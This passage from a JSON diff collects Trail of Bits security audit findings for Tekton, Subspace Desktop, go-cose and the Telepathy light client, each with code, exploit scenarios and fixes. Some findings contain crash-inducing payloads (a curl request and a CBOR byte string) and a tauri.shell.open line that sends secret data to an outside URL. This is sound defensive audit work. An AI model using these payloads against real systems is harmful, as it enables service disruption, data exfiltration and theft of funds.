resources\" feature does not validate repository path Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-10 Target: Dashboard", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "13. Nil dereferences in the trigger interceptor logic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Process functions, which are responsible for executing the various triggers for the git, gitlab, bitbucket, and cel interceptors, do not properly validate request objects, leading to nil dereference panics when requests are submitted without a Context object. func (w *Interceptor) Process(ctx context.Context, r *triggersv1.InterceptorRequest) *triggersv1.InterceptorResponse { headers := interceptors.Canonical(r.Header) // (...) // Next validate secrets if p.SecretRef != nil { // Check the secret to see if it is empty if p.SecretRef.SecretKey == \"\" { interceptor secretRef.secretKey is empty\") return interceptors.Fail(codes.FailedPrecondition, \"github } // (...) ns, _ := triggersv1.ParseTriggerID(r.Context.TriggerID) Figure 13.1: triggers/pkg/interceptors/github/github.go#L48-L85 We tested the panic by forwarding the Tekton Triggers webhook server to localhost and sending HTTP requests to the GitHub endpoint. The Go HTTP server recovers from the panic. curl -i -s -k -X $'POST' \\ -H $'Host: 127.0.0.1:1934' -H $'Content-Length: 178' \\ --data-binary $'{\\x0d\\x0a\\\"header\\\":{\\x0d\\x0a\\\"X-Hub-Signature\\\":[\\x0d\\x0a\\x09\\\"sig\\\"\\x0d\\x0a],\\x0 d\\x0a\\\"X-GitHub-Event\\\":[\\x0d\\x0a\\\"evil\\\"\\x0d\\x0a]\\x0d\\x0a},\\x0d\\x0a\\\"interceptor_pa rams\\\": {\\x0d\\x0a\\x09\\\"secretRef\\\": {\\x0d\\x0a\\x09\\x09\\\"secretKey\\\":\\\"key\\\",\\x0d\\x0a\\x09\\x09\\\"secretName\\\":\\\"name\\\"\\x0d\\x 0a\\x09}\\x0d\\x0a}\\x0d\\x0a}' \\ $'http://127.0.0.1:1934/github' Figure 13.2: The curl request that causes a panic 2022/03/08 05:34:13 http: panic serving 127.0.0.1:49304: runtime error: invalid memory address or nil pointer dereference goroutine 33372 [running]: net/http.(*conn).serve.func1(0xc0001bf0e0) net/http/server.go:1824 +0x153 panic(0x1c25340, 0x30d6060) runtime/panic.go:971 +0x499 github.com/tektoncd/triggers/pkg/interceptors/github.(*Interceptor).Process(0xc00000 d248, 0x216fec8, 0xc0003d5020, 0xc0002b7b60, 0xc0000a7978) github.com/tektoncd/triggers/pkg/interceptors/github/github.go:85 +0x1f5 github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ExecuteInterceptor(0x c000491490, 0xc000280200, 0x0, 0x0, 0x0, 0x0, 0x0) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:128 +0x5df github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ServeHTTP(0xc00049149 0, 0x2166dc0, 0xc0000d42a0, 0xc000280200) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:57 +0x4d net/http.(*ServeMux).ServeHTTP(0xc00042d000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2448 +0x1ad net/http.serverHandler.ServeHTTP(0xc0000d4000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2887 +0xa3 net/http.(*conn).serve(0xc0001bf0e0, 0x216ff00, 0xc00042d200) net/http/server.go:1952 +0x8cd created by net/http.(*Server).Serve net/http/server.go:3013 +0x39b Figure 13.3: Panic trace Exploit Scenario As the codebase continues to grow, a new mechanism is added to call one of the Process functions without relying on HTTP requests (for instance, via a custom RPC client implementation). An attacker uses this mechanism to create a new interceptor. He calls the Process function with an invalid object, causing a panic that crashes the Tekton Triggers webhook server. Recommendations Short term, add checks to verify that request Context objects are not nil before dereferencing them. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "1. Desktop application conguration le stored in group writable le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The desktop application conguration le has group writable permissions, as shown in gure 1.1. >>> ls -l $HOME/.config/subspace-desktop/subspace-desktop.cfg -rw-rw-r-- 1 user user 143 $HOME/.config/subspace-desktop/subspace-desktop.cfg Figure 1.1: Permissions of the $HOME/.config/subspace-desktop/subspace-desktop.cfg le This conguration le contains the rewardAddress eld (gure 1.2), to which the Subspace farmer sends the farming rewards. Therefore, anyone who can modify this le can control the address that receives farming rewards. For this reason, only the le owner should have the permissions necessary to write to it. { \"plot\" : { \"location\" : \"/.local/share/subspace-desktop/plots\" , \"sizeGB\" : 1 }, \"rewardAddress\" : \"stC2Mgq\" , \"launchOnBoot\" : true , \"version\" : \"0.6.11\" , \"nodeName\" : \"agreeable-toothbrush-4936\" } Figure 1.2: An example of a conguration le Exploit Scenario An attacker controls a Linux user who belongs to the victims user group. Because every member of the user group is able to write to the victims conguration le, the attacker is able to change the rewardAddress eld of the le to an address she controls. As a result, she starts receiving the victims farming rewards. Recommendations Short term, change the conguration les permissions so that only its owner can read and write to it. This will prevent unauthorized users from reading and modifying the le. Additionally, create a centralized function that creates the conguration le; currently, the le is created by code in multiple places in the codebase. Long term, create tests to ensure that the conguration le is created with the correct permissions. 2. Insu\u0000cient validation of users reward addresses Severity: Low Diculty: Medium Type: Data Validation Finding ID: TOB-SPDF-2 Target: subspace-desktop/src/pages/ImportKey.vue", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. Improper error handling ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The front end code handles errors incorrectly in the following cases: The Linux auto launcher function createAutostartDir does not return an error if it fails to create the autostart directory. The Linux auto launcher function enable does not return an error if it fails to create the autostart le. The Linux auto launcher function disable does not return an error if it fails to remove the autostart le. The Linux auto launcher function isEnabled always returns true , even if it fails to read the autostart le, which indicates that the auto launcher is disabled. The exportLogs function does not display error messages to users when errors occur. Instead, it silently fails. If rewardAddress is not set, the startFarming function sends an error log to the back end but not to the front end. Despite the error, the function still tries to start farming without a reward address, causing the back end to error out. Without an error message displayed in the front end, the source of the failure is unclear. The Config::init function does not show users an error message if it fails to create the conguration directory. The Config::write function does not show users an error message if it fails to create the conguration directory, and it proceeds to try to write to the nonexistent conguration le. Additionally, it does not show an error message if it fails to write to the conguration le in its call to writeFile . The removePlot function does not return an error if it fails to delete the plots directory. The createPlotDir function does not return an error if it fails to create the plots folder (e.g., if the given user does not have the permissions necessary to create the folder in that directory). This will cause the startPlotting function to fail silently; without an error message, the user cannot know the source of the failure. The createAutostartDir function logs an error unnecessarily. The function determines whether a directory exists by calling the readDir function; however, even though occasionally the directory may not be found (as expected), the function always logs an error if it is not found. Exploit Scenario To store his plots, a user chooses a directory that he does not have the permissions necessary to write to. The program fails but does not display a clear error message with the reason for the failure. The user cannot understand the problem, becomes frustrated, and deletes the application. Recommendations Short term, modify the code in the locations described above to handle errors consistently and to display messages with clear reasons for the errors in the UI. This will make the code more reliable and reduce the likelihood that users will face obstacles when using the Subspace Desktop application. Long term, write tests that trigger all possible error conditions and check that all errors are handled gracefully and are accompanied by error messages displayed to the user where relevant. This will prevent regressions during the development process.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "4. Flawed regex in the Tauri conguration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The Tauri conguration that limits which les the front end can open with the systems default applications is awed. As shown in gure 4.1, the conguration le uses the [/subspace\\\\-desktop/] regex; the Subspace developers intended this regex to match le names that include the /subspace-desktop/ string, but the regex actually matches any string that has a single character inside the regex's square brackets. \"shell\" : { \"all\" : true , \"execute\" : true , \"open\" : \"[/subspace\\\\-desktop/]\" , \"scope\" : [ \"name\" : \"run-osascript\" , \"cmd\" : \"osascript\" , \"args\" : true { } ] }, Figure 4.1: subspace-desktop/src-tauri/tauri.conf.json#L81-L92 For example, tauri.shell.open(\"s\") is accepted as a valid location because s is inside the regexs square brackets. Contrarily, tauri.shell.open(\"z\") is an invalid location because z is not inside the square brackets. Besides opening les, in Linux, the tauri.shell.open function will handle anything that the xdg-open command handles. For example, tauri.shell.open(\"apt://firefox\") shows users a prompt to install Firefox. Attackers could also use the tauri.shell.open function to make arbitrary HTTP requests and bypass the CSPs connect-src directive with calls such as tauri.shell.open(\"https:///?secret_data=\") . Exploit Scenario An attacker nds a cross-site scripting (XSS) vulnerability in the Subspace Desktop front end. He uses the XSS vulnerability to open an arbitrary URL protocol with the exploit described above and gains the ability to remotely execute code on the users machine. For examples of how common URL protocol handlers can lead to remote code execution attacks, refer to the vulnerabilities in the Steam and Visual Studio Code URL protocols. Recommendations Short term, revise the regex so that the front end can open only file: URLs that are within the Subspace Desktop applications logs folder. Alternatively, have the Rust back end serve these les and disallow the front end from accessing any les (see issue TOB-SPDF-5 for a more complete architectural recommendation). Long term, write positive and negative tests that check the developers assumptions related to the Tauri conguration. 5. Insu\u0000cient privilege separation between the front end and back end Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-SPDF-5 Target: The Subspace Desktop architecture", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "6. Vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The Subspace Desktop Tauri application uses vulnerable Rust and Node dependencies, as reported by the cargo audit and yarn audit tools. Among the Rust crates used in the Tauri application, two are vulnerable, three are unmaintained, and six are yanked. The table below summarizes the ndings: Crate Version in Use Finding Latest Safe Version owning_ref 0.4.1 Memory corruption vulnerability ( RUSTSEC-2022-0040 ) Not available time 0.1.43 Memory corruption vulnerability ( RUSTSEC-2020-0071 ) 0.2.23 and newer ansi_term 0.12.1 dotenv 0.15.0 xml-rs 0.8.4 Unmaintained crate ( RUSTSEC-2021-0139 ) Unmaintained crate ( RUSTSEC-2021-0141 ) Unmaintained crate ( RUSTSEC-2022-0048 ) blake2 0.10.2 Yanked crate block-buffer 0.10.0 Yanked crate cpufeatures 0.2.1 Yanked crate iana-time-zone 0.1.44 Yanked crate Multiple alternatives dotenvy quick-xml 0.10.4 0.10.3 0.2.5 0.1.50 sp-version 5.0. For the Node dependencies used in the Tauri application, one is vulnerable to a high-severity issue and another is vulnerable to a moderate-severity issue. These vulnerable dependencies appear to be used only in the development dependencies. Package Finding Latest Safe Version got CVE-2022-33987 (Moderate severity) 11.8.5 and newer git-clone CVE-2022-25900 (High severity) Not available Exploit Scenario An attacker nds a way to exploit a known memory corruption vulnerability in one of the dependencies reported above and takes control of the application. Recommendations Short term, update the dependencies to their newest possible versions. Work with the library authors to update the indirect dependencies. Monitor the development of the x for owning_ref and upgrade it as soon as a safe version of the crate becomes available. Long term, run cargo audit and yarn audit regularly. Include cargo audit and yarn audit in the projects CI/CD pipeline to ensure that the team is aware of new vulnerabilities in the dependencies.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "7. Broken error reporting link ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The create_full_client function calls the sp_panic_handler::set() function to set a URL for a Discord invitation; however, this invitation is broken. The documentation for the sp_panic_handler::set() function states that The bug_url parameter is an invitation for users to visit that URL to submit a bug report in the case where a panic happens. Because the link is broken, users cannot submit bug reports. sp_panic_handler::set( \" https://discord.gg/vhKF9w3x \" , env! ( \"SUBSTRATE_CLI_IMPL_VERSION\" ), ); Figure 7.1: subspace-desktop/src-tauri/src/node.rs#L169-L172 Exploit Scenario A user encounters a crash of Subspace Desktop and is presented with a broken link with which to report the error. The user is unable to report the error. Recommendations Short term, update the bug report link to the correct Discord invitation. Long term, use a URL on a domain controlled by Subspace Network as the bug reporting URL. This will allow Subspace Network developers to make adjustments to the reporting URL without pushing application updates. 8. Side e\u0000ects are triggered regardless of disk_farms validity Severity: Informational Diculty: High Type: Data Validation Finding ID: TOB-SPDF-8 Target: src-tauri/src/farmer.rs#L118-L192", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9. Network conguration path construction is duplicated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", + "body": "The create_full_client function contains code that uses hard-coded strings to indicate conguration paths (gure 9.1) in place of the previously dened DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values, which are used in the other parts of the code. This is a risky coding pattern, as a Subspace developer who is updating the DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values may forget to also update the equivalent values used in the create_full_client function. if primary_chain_node.client.info().best_number == 33670 { if let Some (config_dir) = config_dir { let workaround_file = config_dir.join( \"network\" ).join( \"gemini_1b_workaround\" ); if !workaround_file.exists() { let _ = std::fs::write(workaround_file, &[]); let _ = std::fs::remove_file( config_dir.join( \"network\" ).join( \"secret_ed25519\" ) ); return Err (anyhow!( \"Applied workaround for upgrade from gemini-1b-2022-jun-08, \\ please restart this node\" )); } } } Figure 9.1: subspace-desktop/src-tauri/src/node.rs#L207-L219 Recommendations Short term, update the code in gure 9.1 to use DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE rather than the hard-coded values. This will make eventual updates to these paths less error prone.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Unmarshalling can cause a panic if any header labels are unhashable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "The ensureCritical function checks that all critical labels exist in the protected header. The check for each label is shown in Figure 1.1. 161 if _, ok := h[label]; !ok { Figure 1.1: Line 161 of headers.go The label in this case is deserialized from the users CBOR input. If the label is a non-hashable type (e.g., a slice or a map), then Go will runtime panic on line 161. Exploit Scenario Alice wishes to crash a server running go-cose. She sends the following CBOR message to the server: \\xd2\\x84G\\xc2\\xa1\\x02\\xc2\\x84@0000C000C000. When the server attempts to validate the critical headers during unmarshalling, it panics on line 161. Recommendations Short term, add a validation step to ensure that the elements of the critical header are valid labels. Long term, integrate go-coses existing fuzz tests into the CI pipeline. Although this bug was not discovered using go-coses preexisting fuzz tests, the tests likely would have discovered it if they ran for enough time. Fix Analysis This issue has been resolved. Pull request #78, committed to the main branch in b870a00b4a0455ab5c3da1902570021e2bac12da, adds validations to ensure that critical headers are only integers or strings. 15 Microsoft go-cose Security Assessment (DRAFT)", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. crit label is permitted in unvalidated headers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "The crit header parameter identies which header labels must be understood by an application receiving the COSE message. Per RFC 8152, this value must be placed in the protected header bucket, which is authenticated by the message signature. Figure 2.1: Excerpt from RFC 8152 section 3.1 Currently, the implementation ensures during marshaling and unmarshaling that if the crit parameter is present in the protected header, then all indicated labels are also present in the protected header. However, the implementation does not ensure that the crit parameter is not present in the unprotected bucket. If a user mistakenly uses the unprotected header for the crit parameter, then other conforming COSE implementations may reject the message and the message may be exposed to tampering. Exploit Scenario A library user mistakenly places the crit label in the unprotected header, allowing an adversary to manipulate the meaning of the message by adding, removing, or changing the set of critical headers. Recommendations Add a check during ensureCritical to verify that the crit label is not present in the unprotected header bucket. Fix Analysis This issue has been resolved. Pull request #81, committed to the main branch in 62383c287782d0ba5a6f82f984da0b841e434298, adds validations to ensure that the crit label is not present in unprotected headers. 16 Microsoft go-cose Security Assessment (DRAFT)", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "3. Generic COSE header types are not validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf", + "body": "Section 3.1 of RFC 8152 denes a number of common COSE header parameters and their associated value types. Applications using the go-cose library may rely on COSE-dened headers decoded by the library to be of a specied type. For example, the COSE specication denes the content-type header (label #3) as one of two types: a text string or an unsigned integer. The go-cose library validates only the alg and crit parameters, not content-type. See Figure 3.1 for a list of dened header types. Figure 3.1: RFC 8152 Section 3.1, Table 2 Further header types are dened by the IANA COSE Header Parameter Registry. 17 Microsoft go-cose Security Assessment (DRAFT) Exploit Scenario An application uses go-cose to verify and validate incoming COSE messages. The application uses the content-type header to index a map, expecting the content type to be a valid string or integer. An attacker could, however, supply an unhashable value, causing the application to panic. Recommendations Short term, explicitly document which IANA-dened headers or label ranges are and are not validated. Long term, validate commonly used headers for type and semantic consistency. For example, once counter signatures are implemented, the counter-signature (label #7) header should be validated for well-formedness during unmarshalling. 18 Microsoft go-cose Security Assessment (DRAFT)", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "1. Prover can lock user funds by including ill-formed BigInts in public key commitment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The Rotate circuit does not check for the validity of BigInts included in pubkeysBigIntY . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. The Rotate circuit is designed to prove a translation between an SSZ commitment over a set of validator public keys produced by the Ethereum consensus protocol and a Poseidon commitment over an equivalent list. The SSZ commitment is over public keys serialized as 48-byte compressed BLS public keys, specifying an X coordinate and single sign bit, while the Poseidon commitment is over pairs (X, Y) , where X and Y are 7-limb, 55-bit BigInts. The prover species the Y coordinate for each public key as part of the witness; the Rotate circuit then uses SubgroupCheckG1WithValidX to constrain Y to be valid in the sense that (X, Y) is a point on the BLS12-381 elliptic curve. However, SubgroupCheckG1WithValidX assumes that its input is a properly formed BigInt, with all limbs less than 2 55 . This property is not validated anywhere in the Rotate circuit. By committing to a Poseidon root containing invalid BigInts, a malicious prover can prevent other provers from successfully proving a Step operation, bringing the light client to a halt and causing user funds to be stuck in the bridge. Furthermore, the invalid elliptic curve points would then be usable in the Step circuit, where they are passed without validation to the EllipticCurveAddUnequal function. The behavior of this function on ill-formed inputs is not specied and could allow a malicious prover to forge Step proofs without a valid sync committee signature. Figure 1.1 shows where the untrusted pubkeysBigIntY value is passed to the SubgroupCheckG1WithValidX template. /* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */ component isValidPoint[SYNC_COMMITTEE_SIZE]; for ( var i = 0 ; i < SYNC_COMMITTEE_SIZE; i++) { isValidPoint[i] = SubgroupCheckG1WithValidX(N, K); for ( var j = 0 ; j < K; j++) { isValidPoint[i]. in [ 0 ][j] <== pubkeysBigIntX[i][j]; isValidPoint[i]. in [ 1 ][j] <== pubkeysBigIntY[i][j]; } } Figure 1.1: telepathy/circuits/circuits/rotate.circom#101109 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. Instead of using correctly formatted BigInts to represent the Y values of each public key point, she modies the value by subtracting one from the most signicant limb and adding 2 55 to the second-most signicant limb. She then posts the resulting proof to the LightClient contract via the rotate function, which updates the sync committee commitment to Alices Poseidon commitment containing ill-formed Y coordinates. Future provers would then be unable to use the default witness generator to make new proofs, locking user funds in the bridge. Alice may be able to then exploit invalid assumptions in the Step circuit to forge Step proofs and steal bridge funds. Recommendations Short term, use a Num2Bits component to verify that each limb of the pubkeysBigIntY witness value is less than 2 55 . Long term, clearly document and validate the input assumptions of templates such as SubgroupCheckG1WithValidX . Consider adopting Circom signal tags to automate the checking of these assumptions.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. Prover can lock user funds by supplying non-reduced Y values to G1BigIntToSignFlag ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The G1BigIntToSignFlag template does not check whether its input is a value properly reduced mod p . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. During the Rotate proof, when translating compressed public keys to full (X, Y) form, the prover must supply a Y value with a sign corresponding to the sign bit of the compressed public key. The circuit calculates the sign of Y by passing the Y coordinate (supplied by the prover and represented as a BigInt) to the G1BigIntToSignFlag component (gure 2.1). This component determines the sign of Y by checking if 2*Y >= p . However, the correctness of this calculation depends on the Y value being less than p ; otherwise, a positive, non-reduced value such as p + 1 will be incorrectly interpreted as negative. A malicious prover could use this fact to commit to a non-reduced form of Y that diers in sign from the correct public key. This invalid commitment would prevent future provers from generating Step circuit proofs and thus halt the LightClient , trapping user funds in the Bridge . template G1BigIntToSignFlag(N, K) { signal input in [K]; signal output out; var P[K] = getBLS128381Prime(); var LOG_K = log_ceil(K); component mul = BigMult(N, K); signal two[K]; for ( var i = 0 ; i < K; i++) { if (i == 0 ) { two[i] <== 2 ; } else { two[i] <== 0 ; } } for ( var i = 0 ; i < K; i++) { mul.a[i] <== in [i]; mul.b[i] <== two[i]; } component lt = BigLessThan(N, K); for ( var i = 0 ; i < K; i++) { lt.a[i] <== mul.out[i]; lt.b[i] <== P[i]; } out <== 1 - lt.out; } Figure 2.1: telepathy/circuits/circuits/bls.circom#197226 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. When one of the new sync committee members public key Y value has a negative sign, Alice substitutes it with 2P - Y . This value is congruent to -Y mod p , and thus has positive sign; however, the G1BigIntToSignFlag component will determine that it has negative sign and validate the inclusion in the Poseidon commitment. Future provers will then be unable to generate proofs from this commitment since the committed public key set does not match the canonical sync committee. Recommendations Short term, constrain the pubkeysBigIntY values to be less than p using BigLessThan . Long term, constrain all private witness values to be in canonical form before use. Consider adopting Circom signal tags to automate the checking of these assumptions.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "3. Incorrect handling of point doubling can allow signature forgery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "When verifying the sync committee signature, individual public keys are aggregated into an overall public key by repeatedly calling G1Add in a tree structure. Due to the mishandling of elliptic curve point doublings, a minority of carefully selected public keys can cause the aggregation to result in an arbitrary, maliciously chosen public key, allowing signature forgeries and thus malicious light client updates. When bit1 and bit2 of G1Add are both set, G1Add computes out by calling EllipticCurveAddUnequal : template parallel G1Add(N, K) { var P[ 7 ] = getBLS128381Prime(); signal input pubkey1[ 2 ][K]; signal input pubkey2[ 2 ][K]; signal input bit1; signal input bit2; /* COMPUTE BLS ADDITION */ signal output out[ 2 ][K]; signal output out_bit; out_bit <== bit1 + bit2 - bit1 * bit2; component adder = EllipticCurveAddUnequal( 55 , 7 , P); for ( var i = 0 ; i < 2 ; i++) { for ( var j = 0 ; j < K; j++) { adder.a[i][j] <== pubkey1[i][j]; adder.b[i][j] <== pubkey2[i][j]; } } Figure 3.1: telepathy/circuits/circuits/bls.circom#82 The results of EllipticCurveAddUnequal are constrained by equations that reduce to 0 = 0 if a and b are equal: // constrain x_3 by CUBIC (x_1 + x_2 + x_3) * (x_2 - x_1)^2 - (y_2 - y_1)^2 = 0 mod p component dx_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers abs val < k*2^{2n} component dy_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers < k*2^{2n} for ( var i = 0 ; i < k; i++){ dx_sq.a[i] <== b[ 0 ][i] - a[ 0 ][i]; dx_sq.b[i] <== b[ 0 ][i] - a[ 0 ][i]; dy_sq.a[i] <== b[ 1 ][i] - a[ 1 ][i]; dy_sq.b[i] <== b[ 1 ][i] - a[ 1 ][i]; } [...] component cubic_mod = SignedCheckCarryModToZero(n, k, 4 *n + LOGK3, p); for ( var i= 0 ; i 0 ) { POSEIDON_SIZE = 16 ; } hashers[i] = Poseidon(POSEIDON_SIZE); for ( var j = 0 ; j < 15 ; j++) { if (i * 15 + j >= LENGTH ) { hashers[i].inputs[j] <== 0 ; } else { hashers[i].inputs[j] <== in [i*15 + j]; } } if (i > 0 ) { hashers[i].inputs[15] <== hashers[i- 1]. out ; } } out <== hashers[NUM_HASHERS-1]. out ; } Figure 6.1: telepathy/circuits/circuits/poseidon.circom#2551 The Poseidon authors recommend using a sponge construction, which has better provable security properties than the MD construction. One could implement a sponge by using PoseidonEx with nOuts = 1 for intermediate calls and nOuts = 2 for the nal call. For each call, out[0] should be passed into the initialState of the next PoseidonEx component, and out[1] should be used for the nal output. By maintaining out[0] as hidden capacity, the overall construction will closely approximate a pseudorandom function. Although the MD construction oers sucient protection against collision for the current commitment use case, hash functions constructed in this manner do not fully model random functions. Future uses of the PoseidonFieldArray circuit may expect stronger cryptographic properties, such as resistance to length extension. Additionally, by utilizing the initialState input, as shown in gure 6.2, on each permutation call, 16 inputs can be compressed per template instantiation, as opposed to the current 15, without any additional cost per compression. This will reduce the number of compressions required and thus reduce the size of the circuit. template PoseidonEx(nInputs, nOuts) { signal input inputs[nInputs]; signal input initialState; signal output out [nOuts]; Figure 6.2: circomlib/circuits/poseidon.circom#6770 Recommendations Short term, convert PoseidonFieldArray to use a sponge construction, ensuring that out[0] is preserved as a hidden capacity value. Long term, ensure that all hashing primitives are used in accordance with the published recommendations.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Merkle root reconstruction is vulnerable to forgery via proofs of incorrect length ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB contract accepts and veries Merkle proofs that a particular smart contract event was issued in a particular Ethereum 2.0 beacon block. Because the proof validation depends on the length of the proof rather than the index of the value to be proved, Merkle proofs with invalid lengths can be used to mislead the verier and forge proofs for nonexistent transactions. The SSZ.restoreMerkleRoot function reconstructs a Merkle root from the user-supplied transaction receipt and Merkle proof; the light client then compares the root against the known-good value stored in the LightClient contract. The index argument to restoreMerkleRoot determines the specic location in the block state tree at which the leaf node is expected to be found. The arguments leaf and branch are supplied by the prover, while the index argument is calculated by the smart contract verier. function restoreMerkleRoot ( bytes32 leaf , uint256 index , bytes32 [] memory branch) internal pure returns ( bytes32 ) { } bytes32 value = leaf; for ( uint256 i = 0 ; i < branch.length; i++) { if ((index / ( 2 ** i)) % 2 == 1 ) { value = sha256( bytes .concat(branch[i], value)); } else { value = sha256( bytes .concat(value, branch[i])); } } return value; Figure 7.1: telepathy/contracts/src/libraries/SimpleSerialize.sol#2438 A malicious user may supply a proof (i.e., a branch list) that is longer or shorter than the number of bits in the index . In this case, the leaf value will not in fact correspond to the receiptRoot but to some other value in the tree. In particular, the user can convince the smart contract that receiptRoot is the value at any generalized index given by truncating the leftmost bits of the true index or by extending the index by arbitrarily many zeroes following the leading set bit. If one of these alternative indexes contains data controllable by the user, who may for example be the block proposer, then the user can forge a proof for a transaction that did not occur and thus steal funds from bridges relying on the TargetAMB . Exploit Scenario Alice, a malicious ETH2.0 validator, encodes a fake transaction receipt hash encoding a deposit to a cross-chain bridge into the graffiti eld of a BeaconBlock . She then waits for the block to be added to the HistoricalBlocks tree and further for the generalized index of the historical block to coincide with an allowable index for the Merkle tree reconstruction. She then calls executeMessageFromLog with the transaction receipt, allowing her to withdraw from the bridge based on a forged proof of deposit and steal funds. Recommendations Short term, rewrite restoreMerkleRoot to loop over the bits of index , e.g. with a while loop terminating when index = 1 . Long term, ensure that proof verication routines do not use control ow determined by untrusted input. The verication routine for each statement to be proven should treat all possible proofs uniformly.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "8. LightClient forced nalization could allow bad updates in case of a DoS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "Under periods of delayed nality, the LightClient may nalize block headers with few validators participating. If the Telepathy provers were targeted by a denial-of-service (DoS) attack, this condition could be triggered and used by a malicious validator to take control of the LightClient and nalize malicious block headers. The LightClient contract typically considers a block header to be nalized if it is associated with a proof that more than two-thirds of sync committee participants have signed the header. Typically, the sync committee for the next period is determined from a nalized block in the current period. However, in the case that the end of the sync committee period is reached before any block containing a sync committee update is nalized, a user may call the LightClient.force function to apply the update with the most signatures, even if that update has less than a majority of signatures. A forced update may have as few as 10 participating signers, as determined by the constant MIN_SYNC_COMMITTEE_PARTICIPANTS . /// @notice In the case there is no finalization for a sync committee rotation, this method /// is used to apply the rotate update with the most signatures throughout the period. /// @param period The period for which we are trying to apply the best rotate update for. function force ( uint256 period ) external { LightClientRotate memory update = bestUpdates[period]; uint256 nextPeriod = period + 1 ; if (update.step.finalizedHeaderRoot == 0 ) { revert( \"Best update was never initialized\" ); } else if (syncCommitteePoseidons[nextPeriod] != 0 ) { revert( \"Sync committee for next period already initialized.\" ); } else if (getSyncCommitteePeriod(getCurrentSlot()) < nextPeriod) { revert( \"Must wait for current sync committee period to end.\" ); } setSyncCommitteePoseidon(nextPeriod, update.syncCommitteePoseidon); } Figure 8.1: telepathy/contracts/src/lightclient/LightClient.sol#123 Proving sync committee updates via the rotate ZK circuit requires signicant computational power; it is likely that there will be only a few provers online at any given time. In this case, a DoS attack against the active provers could cause the provers to be oine for a full sync committee period (~27 hours), allowing the attacker to force an update with a small minority of validator stake. The attacker would then gain full control of the light client and be able to steal funds from any systems dependent on the correctness of the light client. Exploit Scenario Alice, a malicious ETH2.0 validator, controls about 5% of the total validator stake, split across many public keys. She waits for a sync committee period, includes at least 10 of her public keys, then launches a DoS against the active Telepathy 